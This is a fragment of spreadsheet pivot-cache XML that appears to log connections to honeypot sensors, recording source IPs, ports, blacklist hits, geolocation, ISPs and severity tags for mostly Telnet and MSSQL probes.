    <s v="2012-01-31"/>
    <s v="GMEDIA-ID-SEMARANG"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:67f7:7b3a"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2651"/>
    <x v="2651"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-08T05:00:56"/>
    <d v="2024-08-31T06:49:28"/>
    <d v="2025-04-08T05:00:56"/>
    <n v="146"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:ssh']&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_MT-CPA_H31&amp;&amp;SMA-LAB_MT-CPA_H14"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;61078&amp;&amp;46523&amp;&amp;80&amp;&amp;NA&amp;&amp;9100&amp;&amp;6856"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="41"/>
    <s v="Gyeonggi-do"/>
    <s v="Seongnam-si"/>
    <s v="Seongnam-si (Jeongja-dong)"/>
    <s v="1897000"/>
    <s v="NA"/>
    <s v="37.3638"/>
    <s v="127.116"/>
    <s v="4766"/>
    <s v="Korea Telecom"/>
    <s v="Korea Telecom"/>
    <s v="business"/>
    <s v="Korea Telecom"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA&amp;&amp;connection&amp;&amp;login&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:d3c5:ba9c"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2652"/>
    <x v="2652"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-08T04:57:17"/>
    <d v="2025-04-08T04:56:26"/>
    <d v="2025-04-08T04:57:17"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KW"/>
    <s v="Kuwait"/>
    <s v="KU"/>
    <s v="Al Asimah"/>
    <s v="NA"/>
    <s v="Kuwait City (Jibla)"/>
    <s v="285787"/>
    <s v="NA"/>
    <s v="29.3716"/>
    <s v="47.9736"/>
    <s v="42961"/>
    <s v="Mobile Telecommunications Company"/>
    <s v="Mobile Telecommunications Company"/>
    <s v="cellular"/>
    <s v="Zain Mobile Connectivity Services"/>
    <s v="2012-01-03"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2524:5eb1"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2653"/>
    <x v="2653"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-08T04:44:08"/>
    <d v="2025-04-08T04:44:08"/>
    <d v="2025-04-08T04:44:08"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="OC"/>
    <s v="Oceania"/>
    <s v="AU"/>
    <s v="Australia"/>
    <s v="VIC"/>
    <s v="Victoria"/>
    <s v="Melbourne"/>
    <s v="Melbourne"/>
    <s v="2158177"/>
    <s v="3001"/>
    <s v="-37.8136"/>
    <s v="144.963"/>
    <s v="1221"/>
    <s v="ASN-TELSTRA"/>
    <s v="Telstra Internet"/>
    <s v="corporate"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:789d:facb"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2654"/>
    <x v="2654"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-08T04:26:25"/>
    <d v="2025-04-08T04:26:25"/>
    <d v="2025-04-08T04:26:25"/>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e:f58"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2655"/>
    <x v="2655"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-08T04:12:49"/>
    <d v="2025-04-08T04:12:49"/>
    <d v="2025-04-08T04:12:49"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai Suburban"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="17813"/>
    <s v="MTNL-AP"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="corporate"/>
    <s v="MTNL Mumbai"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3bb4:bffa"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2656"/>
    <x v="2656"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-08T04:01:02"/>
    <d v="2025-04-05T01:45:57"/>
    <d v="2025-04-08T04:01:02"/>
    <n v="56"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H3&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="NC"/>
    <s v="North Carolina"/>
    <s v="Wake"/>
    <s v="Morrisville"/>
    <s v="4480285"/>
    <s v="27560"/>
    <s v="35.8235"/>
    <s v="-78.8256"/>
    <s v="16591"/>
    <s v="Google Fiber Inc."/>
    <s v="Google Fiber Inc."/>
    <s v="residential"/>
    <s v="Google Fiber Inc"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:8838:bb55"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2657"/>
    <x v="2657"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-08T03:48:04"/>
    <d v="2025-04-08T03:48:04"/>
    <d v="2025-04-08T03:48:04"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="OC"/>
    <s v="Oceania"/>
    <s v="AU"/>
    <s v="Australia"/>
    <s v="VIC"/>
    <s v="Victoria"/>
    <s v="Melbourne"/>
    <s v="Melbourne"/>
    <s v="2158177"/>
    <s v="3001"/>
    <s v="-37.8136"/>
    <s v="144.963"/>
    <s v="7545"/>
    <s v="TPG-INTERNET-AP"/>
    <s v="TPG Internet Pty Ltd"/>
    <s v="corporate"/>
    <s v="TPG Internet Pty Ltd"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6eae:d51f"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2658"/>
    <x v="2658"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-08T02:57:55"/>
    <d v="2023-07-26T10:07:53"/>
    <d v="2025-04-08T02:57:55"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MT-CPA_H24&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="14744&amp;&amp;23"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="PB"/>
    <s v="Punjab"/>
    <s v="Ludhiana"/>
    <s v="Ludhiana"/>
    <s v="1264728"/>
    <s v="NA"/>
    <s v="30.912"/>
    <s v="75.8538"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="business"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3bb2:690"/>
    <s v="None"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2659"/>
    <x v="2659"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-08T02:54:05"/>
    <d v="2025-04-07T19:32:44"/>
    <d v="2025-04-08T02:54:05"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H43&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai Suburban"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="business"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="2010-02-24"/>
    <s v="MTNL"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b63c:e91e"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2660"/>
    <x v="2660"/>
    <s v="114-33-141-191.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-08T02:01:47"/>
    <d v="2023-08-26T14:30:37"/>
    <d v="2025-04-08T02:01:47"/>
    <n v="1777"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_MT-CPA_H35&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H45"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;1365&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NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7221:8dbf"/>
    <s v="C-I_D"/>
    <s v="medium&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2661"/>
    <x v="2661"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-08T00:52:42"/>
    <d v="2025-04-07T12:52:09"/>
    <d v="2025-04-08T00:52:42"/>
    <n v="23"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="True"/>
    <s v="{'z.mailspike.net': ['unknown']}"/>
    <n v="32"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Thane"/>
    <s v="Navi Mumbai (Reliance Corporate Park)"/>
    <s v="6619347"/>
    <s v="NA"/>
    <s v="19.136"/>
    <s v="73.0039"/>
    <s v="55836"/>
    <s v="Reliance Jio Infocomm Limited"/>
    <s v="Reliance Jio Infocomm Limited"/>
    <s v="cellular"/>
    <s v="JIO FTTX SUBSCRIBER"/>
    <s v="2010-10-27"/>
    <s v="RELIANCEJIO-IN"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3125:c81a"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2662"/>
    <x v="2662"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T23:29:21"/>
    <d v="2025-04-07T17:47:49"/>
    <d v="2025-04-07T23:29:21"/>
    <n v="7"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_SOCKS5_H6&amp;&amp;SMA-LAB_POSTGRES_HC1"/>
    <s v="1080&amp;&amp;5432"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="26"/>
    <s v="Thừa Thiên Huế Province"/>
    <s v="Thành Phố Huế"/>
    <s v="Huế"/>
    <s v="1580240"/>
    <s v="NA"/>
    <s v="16.4619"/>
    <s v="107.595"/>
    <s v="7552"/>
    <s v="Viettel Group"/>
    <s v="Viettel Corporation"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2007-05-21"/>
    <s v="VIETTEL-VN"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_SOCKS5:NA}&amp;&amp;{Data_POSTGRES:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7502:d94e"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2663"/>
    <x v="2663"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T23:18:23"/>
    <d v="2025-04-07T23:17:28"/>
    <d v="2025-04-07T23:18:23"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="ID"/>
    <s v="Indonesia"/>
    <s v="JB"/>
    <s v="West Java"/>
    <s v="Kota Depok"/>
    <s v="Depok"/>
    <s v="1645524"/>
    <s v="NA"/>
    <s v="-6.4"/>
    <s v="106.819"/>
    <s v="7713"/>
    <s v="Telekomunikasi Indonesia (PT)"/>
    <s v="PT. TELKOM INDONESIA"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="2009-10-20"/>
    <s v="TLKM_BB_SERVICE_180_252_DIVRE2"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b4fc:59b8"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2664"/>
    <x v="2664"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T23:16:21"/>
    <d v="2025-04-07T23:16:21"/>
    <d v="2025-04-07T23:16:21"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="ID"/>
    <s v="Indonesia"/>
    <s v="JK"/>
    <s v="Jakarta"/>
    <s v="Kota Administrasi Jakarta Selatan"/>
    <s v="Jakarta"/>
    <s v="1642911"/>
    <s v="NA"/>
    <s v="-6.22639"/>
    <s v="106.832"/>
    <s v="4787"/>
    <s v="ASN-CBN"/>
    <s v="Indonesia Network Information Center"/>
    <s v="corporate"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6771:4c4a"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2665"/>
    <x v="2665"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T23:07:21"/>
    <d v="2025-03-30T12:40:52"/>
    <d v="2025-04-07T23:07:21"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'korea.services.net': ['unknown']}"/>
    <n v="64"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="46"/>
    <s v="Jeollanam-do"/>
    <s v="Haenam-gun"/>
    <s v="Haenam-gun (Sani-myeon)"/>
    <s v="1844748"/>
    <s v="NA"/>
    <s v="34.6593"/>
    <s v="126.429"/>
    <s v="4766"/>
    <s v="Korea Telecom"/>
    <s v="Korea Telecom"/>
    <s v="business"/>
    <s v="Jeonnambonbujang"/>
    <s v="2004-08-02"/>
    <s v="KORNET"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b03:ba55"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2666"/>
    <x v="2666"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T22:45:12"/>
    <d v="2025-04-07T22:45:12"/>
    <d v="2025-04-07T22:45:12"/>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d:9d3b"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2667"/>
    <x v="2667"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T22:29:45"/>
    <d v="2025-04-07T22:26:06"/>
    <d v="2025-04-07T22:29:45"/>
    <n v="4"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IR"/>
    <s v="Iran"/>
    <s v="23"/>
    <s v="Tehran"/>
    <s v="Shahrestān-e Tehrān"/>
    <s v="Tehrān"/>
    <s v="6659608"/>
    <s v="NA"/>
    <s v="35.7219"/>
    <s v="51.3347"/>
    <s v="58224"/>
    <s v="Iran Telecommunication Company PJS"/>
    <s v="Iran Telecommunication Company PJS"/>
    <s v="business"/>
    <s v="Telecommunication Company"/>
    <s v="2012-08-13"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:97ea:4dc9"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2668"/>
    <x v="2668"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T22:22:08"/>
    <d v="2025-04-07T22:22:08"/>
    <d v="2025-04-07T22:22:08"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
